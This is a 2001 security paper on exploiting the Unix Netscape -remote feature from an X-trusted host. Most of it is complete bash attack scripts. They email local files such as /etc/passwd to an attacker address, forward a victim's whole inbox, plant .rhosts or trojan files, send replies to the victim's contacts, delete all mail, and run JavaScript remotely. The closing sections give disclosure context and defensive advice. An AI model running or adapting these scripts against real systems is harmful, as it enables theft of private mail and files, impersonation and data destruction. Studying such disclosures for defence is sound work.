Exploiting Trust with the Netscape -remote Feature Gurney Halleck 6/19/01 Summary: Netscape under Unix provides a remote control feature that can be exploited by an attacker from a trusted host. This feature is explored, examples are provides and the implications discussed. Main: The remote feature has been incorporated in to Netscape since version 1.1 and is planned for inclusion in Mozilla. While obscure, it is documented at http://home.netscape.com/newsref/std/x-remote.html and some discussion of its use by an attacker have been discussed on BugTraq. (Message IDs: 199605311304.PAA25201@imhotep.cst.cnes.fr, 9605270435.AA16507@java.sg.fp.cibcwg.com and others) While the potential for exploit through X Windows trust (via xhost) are relatively well known, this feature adds an extra dimension to the issue. The -remote feature allows for certain commands to be passed to an existing instance of Netscape from either the local host or a remote host that has been given access to the display via the xhost command. netscape -display remotehosts:0.0 -remote Commands listed in the Netscape documentation include: openURL() - Opens a specified URL openFile() - Opens a specified File saveAs() - Saves a File mailto() - Composes an email message Glossed over in the documentation is that calls to the Netscape API, some of which are listed in the Netscape.ad file (located in the Netscape installation directory), can also be called with the -remote feature. One of the most interesting is xfeDoCommand(). Arguments can include: selectAll - Select all of the current text copy - copy selected text paste - paste copied text previousMessage - move to previous message nextMessage - move to next message openSelected - open selected message sendMessageNow - send composed message replyToAll - reply to all deleteMessage - delete selected message emptyTrash - empty Trash exit - exit the browser Almost anything that can be bound to a short cut key, as demonstrated in the Netscape.ad file, can be called remotely. Demonstration Scripts: The following are shell scripts and discussion that demonstrate the exploitation of these features. nsKill: This script uses a call to xfeDoCommand(exit) to simply cause the remote browser to exit. While annoying, it does not pose much of a threat. %< -- BEGIN nsKill -- #! /bin/bash # # Gurney Halleck # 6/18/2001 # # Summary: # # nsKill: Demonstration script for exploiting the Unix Netscape # -remote feature. Kill Netscape remotely # # Description: # # This script will send the exit command to a remote Netscape # The victim must be xhost +'ed to # the attacking host and have Netscape running. # # Usage: # nsKill # # = display of the remote machine (somehost:0.0) # # Ex. nsKill remotehost:0.0 # ## Show usage if [ $# -lt 1 ] then echo "Usage:" echo " nsKill " exit fi ## Exit Netscape netscape -display $1 -remote "xfeDoCommand(exit)" %< -- END nsKill -- nsSaveFile: This script opens a specified URL and then save the file into the users local directory under the provided name. It could be used to create a .rhosts file or deliver a trojan shell script. (specially if the user has '.' it their path) If the file exists on the local machine a confirmation box will appear requiring the users to take an action but if no file exists with that name it will save the file without assistance. It cleans up its actions by sending a "back" command to the browser so that the previous page is displayed to the user. %< -- BEGIN nsSaveFile -- #! /bin/bash # # Gurney Halleck # 6/18/2001 # # Summary: # # nsSaveFile: Demonstration script for exploiting the Unix Netscape # -remote feature. It opens a URL and saves it to the users directory. # # Description: # # This script will open a specified URL and save it as a text file in the # victims directory. This could be used, for example, to create a .rhosts # file in the victims home directory. The victim must be xhost +'ed to # the attacking host and have Netscape running. # # Usage: # nsSaveFile # # = display of the remote machine (somehost:0.0) # = the URL to open # = file name to save as # # Ex. nsSaveFile remotehost:0.0 http://web.server/rhosts.txt .rhosts # ## Show usage if [ $# -lt 3 ] then echo "Usage:" echo " nsSaveFile " exit fi ## Open the URL netscape -display $1 -remote "openURL($2)" ## Save as text netscape -display $1 -remote "SaveAs($3,text)" ## Clean up by going back a page netscape -display $1 -remote "xfeDoCommand(back)" %< -- END nsSaveFile -- nsSendFile: This script begins to show how we can remotely manipulate the browser. It opens a specified URL, which could be a local file, and then emails it to a provided address. The browser is directed to open a URL. (which could be a local file) Then using the selectAll and copy commands, the contents of the page are copied. A URL with the mailto: tag is provided including an email address and subject line. By providing a subject line the cursor is positioned in the message body section. The previously copied text is then pasted into the body of the message. The sendMessageNow command is used to immediately send the message. No user action is required to send the message since an address, subject line and body have been provided. %< -- BEGIN nsSendFile -- #! /bin/bash # # Gurney Halleck # 6/18/2001 # # Summary: # # nsSendFile: Demonstration script for exploiting the Unix Netscape # -remote feature. Open a URL and send it to a specified email address. # # Description: # # This script will open a specified URL, which could be a local file, and # send it to a specified email address. The victim must be xhost +'ed to # the attacking host and have Netscape running. # # Usage: # nsSendFile # # = display of the remote machine (somehost:0.0) # = URL to open (could be a local file) # = email address to send the URL to # # Ex. nsSendFile remotehost:0.0 file://localhost/etc/passwd me@my.address # ## Show usage if [ $# -lt 3 ] then echo "Usage:" echo " nsSendFile " exit fi ## Open URL netscape -display $1 -remote "openURL($2)" ## Select contents netscape -display $1 -remote 'xfeDoCommand(selectAll)' ## Copy selected netscape -display $1 -remote 'xfeDoCommand(copy)' ## Compose new message netscape -display $1 -remote "openURL(mailto:$3?subject=For your Review)" ## Paste contents netscape -display $1 -remote 'xfeDoCommand(paste)' ## Send message netscape -display $1 -remote 'xfeDoCommand(sendMessageNow)' ## Wait for message to be sent sleep 10 ## Clean up netscape -display $1 -remote 'xfeDoCommand(back)' %< -- END nsSendFile -- nsSendInbox: Using some of the previous tricks this script walks the users Inbox sending each message to the specified address. Netscape is directed to open the Inbox and expand message the threads. Since we don't know which message is currently selected (we could be at the bottom of the list) we back up by the number of messages we want to capture. The script then moves down the Inbox opening and copying each message and then composing, pasting and sending a new message to the specified email address. %< -- BEGIN nsSendInbox -- #! /bin/bash # # Gurney Halleck # 6/18/2001 # # Summary: # # nsSendInbox: Demonstration script for exploiting the Unix Netscape # -remote feature. Send Inbox messages. # # Description: # # This script will send messages from the victim's Inbox to a # specified mail address. The victim must be xhost +'ed to # the attacking host and have Netscape running. # # Usage: # nsSendInbox <# of messages> # # = display of the remote machine (somehost:0.0) # = email address to send messages to # <# of messages> = number of messages to send # # Ex. nsSendInbox remotehost:0.0 me@my.address 5 # ## Show usage if [ $# -lt 3 ] then echo "Usage:" echo " nsSendInbox <# of messages>" exit fi ## Open messenger Inbox netscape -display $1 -remote "xfeDoCommand(openInbox)" ## Expand all threads so we don't skip over messages netscape -display $1 -remote "xfeDoCommand(expandAll)" ## Move back just in case we are at the bottom of the message list count=0 while [ $count -lt $3 ] do netscape -display $1 -remote "xfeDoCommand(previousMessage)" let count=$count+1 done ## Open the message currently selected/highlighted netscape -display $1 -remote "xfeDoCommand(openSelected)" ## Loop over messages sending each one count=0 while [ $count -lt $3 ] do ## Select all the text of the opened message netscape -display $1 -remote 'xfeDoCommand(selectAll)' ## Copy selected text netscape -display $1 -remote 'xfeDoCommand(copy)' ## Compose a new message using the specified email address ## Specifying a subject line places the cursor in the body netscape -display $1 -remote "openURL(mailto:$2?subject=For your Review)" ## Paste previously selected text netscape -display $1 -remote 'xfeDoCommand(paste)' ## Send the message netscape -display $1 -remote 'xfeDoCommand(sendMessageNow)' ## Sleep a bit so that the message can be sent sleep 10 ## Select the next message netscape -display $1 -remote "xfeDoCommand(nextMessage)" let count=$count+1 ## do it all again done ## clean up by closing the message window netscape -display $1 -remote "xfeDoCommand(close)" %< -- END nsSendInbox -- nsReplyAll: This script opens and copies the contents of a URL. Then, like nsSendInbox, it walks the users Inbox. This time it does a Reply To All on each message and pastes in the contents of the specified URL. %< -- BEGIN nsReplyAll -- #! /bin/bash # # Gurney Halleck # 6/18/2001 # # Summary: # # nsReplyAll: Demonstration script for exploiting the Unix Netscape # -remote feature. Make custom replies to Inbox messages # # Description: # # This script will open a URL, copy the contents of the page, # then replies to Inbox messages appending the contents to # each the message. # The victim must be xhost +'ed to the attacking host and have # Netscape running. # # Usage: # nsReplyAll <# of messages> # # = display of the remote machine (somehost:0.0) # = contents to attack to reply # <# of messages> = number of messages to reply to # # Ex. nsReplyAll remotehost:0.0 http://web.server/insult.txt 5 # ## Show usage if [ $# -lt 3 ] then echo "Usage:" echo " nsReplyAll <# of messages>" exit fi ## Open URL netscape -display $1 -raise -remote "openURL($2)" ## wait for the page to come up sleep 5 ## Select the text netscape -display $1 -remote "xfeDoCommand(selectAll)" ## Copy the text netscape -display $1 -remote "xfeDoCommand(copy)" ## Back up netscape -display $1 -remote "xfeDoCommand(back)" ## Open messenger Inbox netscape -display $1 -raise -remote "xfeDoCommand(openInbox)" ## Expand all threads so we don't skip over messages netscape -display $1 -remote "xfeDoCommand(expandAll)" ## Move back just in case we are at the bottom of the message list count=0 while [ $count -lt $3 ] do netscape -display $1 -remote "xfeDoCommand(previousMessage)" let count=$count+1 done ## Loop over messages replying to each one count=0 while [ $count -lt $3 ] do ## ReplyToAll to current message netscape -display $1 -remote "xfeDoCommand(replyToAll)" ## Paste in our special comments netscape -display $1 -remote "xfeDoCommand(paste)" ## Send the message netscape -display $1 -remote 'xfeDoCommand(sendMessageNow)' ## Sleep a bit so that the message can be sent sleep 10 ## Select the next message netscape -display $1 -remote "xfeDoCommand(nextMessage)" let count=$count+1 ## do it all again done ## clean up by closing the message window netscape -display $1 -remote "xfeDoCommand(close)" %< -- END nsReplyAll -- nsDelInbox: This time we walk the users Inbox deleting each message and then finish by emptying the trash. (permanently deleting the messages) %< -- BEGIN nsDelInbox -- #! /bin/bash # # Gurney Halleck # 6/18/2001 # # Summary: # # nsDelInbox: Demonstration script for exploiting the Unix Netscape # -remote feature. Delete messages in the Inbox # # Description: # # This script will delete messages from the victim's Inbox. # The victim must be xhost +'ed to the attacking host # and have Netscape running. # # Usage: # nsDelInbox <# of messages> # # = display of the remote machine (somehost:0.0) # <# of messages> = number of messages to delete # # Ex. nsDelInbox remotehost:0.0 5 # ## Show usage if [ $# -lt 2 ] then echo "Usage:" echo " nsDelInbox <# of messages to delete>" exit fi ## Open messenger Inbox netscape -display $1 -remote "xfeDoCommand(openInbox)" ## Expand all threads so we don't skip over messages netscape -display $1 -remote "xfeDoCommand(expandAll)" ## Move back just in case we are at the bottom of the message list count=0 while [ $count -lt $2 ] do netscape -display $1 -remote "xfeDoCommand(previousMessage)" let count=$count+1 done ## Loop over messages deleting each one count=0 while [ $count -lt $2 ] do ## Delete the current message netscape -display $1 -remote 'xfeDoCommand(deleteMessage)' let count=$count+1 ## do it all again done ## Empty the trash - bye, bye netscape -display $1 -remote 'xfeDoCommand(emptyTrash)' %< -- END nsDelInbox -- JavaScript/Java: Another avenue of exploration is the remote execution of JavaScript (as shown below) and the forced execution of Java applets. The nsJSTest script is a demonstration of remote JavaScript execution. %< -- BEGIN nsJSTest -- #! /bin/bash # # Gurney Halleck # 6/18/2001 # # nsJSTest: Demonstration script for exploiting the Unix Netscape # -remote feature. Execute JavaScript on a remote host. # The victim must be xhost +'ed to the attacking host # and have Netscape running. # # Usage: nsTest ## Show usage if [ $# -lt 1 ] then echo "Usage:" echo " nsJSTest " exit fi netscape -display $1 -remote "openURL(\ javascript:\ if (confirm(\"Your browser is insecure\") ) {\ location=\"http://www.blackknife.com/\"; }\ else {\ alert(\"I wouldn't be so sure\");}" %< -- END nsJSTest -- Script Discussion: None of the scripts are very stealthy in their actions. Sent messages will be in the Sent mail box (if that feature is selected), unread messages will be marked read, windows will be raised, URLs will be added to the browser history and other indications will be present. As the scripts are run, all activity is visible such that to be successful the user would have to be away from the workstation. The -remote feature acts on the first instance of Netscape that it can find. If multiple instances exist the specific window ID can be passed with the -id parameter. None of these scripts include that capability but it could be easily added so that specific Netscape instances and windows are targeted. The scripts are not in anyway intelligent. Multiple instances of Netscape, timing issues and various other factors may cause them to hang. In testing, each of these scripts were successful with various versions of Netscape on a number of Unix-like OS's. Associative Trust: While testing the scripts, the issue of associative trust was re-emphasized. Some of the tests included the configuration where a user on Host B had xhost +'ed both Host A and C as show below: +------+ | Host | < Victim | B | +------+ / \ Trust / \ Trust / \ / \ +------+ +------+ Attacker > | Host | | Host | | A |============| C | +------+ ^ +------+ Associative Trust Relationship The attacker was positioned on Host A and was successful in manipulating an instance of Netscape running on Host C with its display forwarded to Host B. An associative trust relationship is created by the user on Host B which allows the attacker to view or manipulate files on Host C. Conclusions: Security issues relating to X Windows trust relationships are well known and documented. The Netscape -remote feature only provides a new twist on an existing vulnerability. Almost everything that can be done using this feature could be accomplished by a knowledgeable X Windows programmer. The -remote feature just makes the end goal that much more easy to accomplish by providing a simple interface. Emphasis needs to be made regarding trust relationship and their associative properties. An X Windows user can create a trust relationship between two systems that would not normally trust each other. Some examples beyond the simple xhost +'ed scenario include: An instance of Netscape tunneled through ssh on one machine could be manipulated by an attacker from another xhost +'ed machine. An attacker could open a session via SSL or VPN to a protected host using the victims credentials and capture or manipulate files on that protected host. Users and administrators need to understand these issues and make informed decisions about the trust relationships that they create. Ssh can provide protection if Xauthority is enabled (usually the default) and there are no xhost +'ed hosts. Ideally, all connections would be tunneled through ssh but often this is not possible due to various real world issues. It appears that the Mozilla team is planning to incorporate the -remote feature into Mozilla. (http://www.mozilla.org/unix/remote.html) It is not known if there is any real world use of the -remote feature beyond the openURL() command. It would seem advisable to limit the capabilities of this feature in future releases of Mozilla. Further Investigation: The execution of JavaScript was not investigated beyond the simple example. Injection of hostile JavaScript or forcing the execution of hostile Java applets could provide other more complex exploits. This paper and related information can be found at: http://www.blackknife.com Disclaimer: The information provided in this paper is for demonstrative purposes only. The author(s) take no responsibility for the use of or damages caused by the information provided. Distribution: This paper may be freely copied or distributed in any form provided the content is unmodified and proper attribution is provided.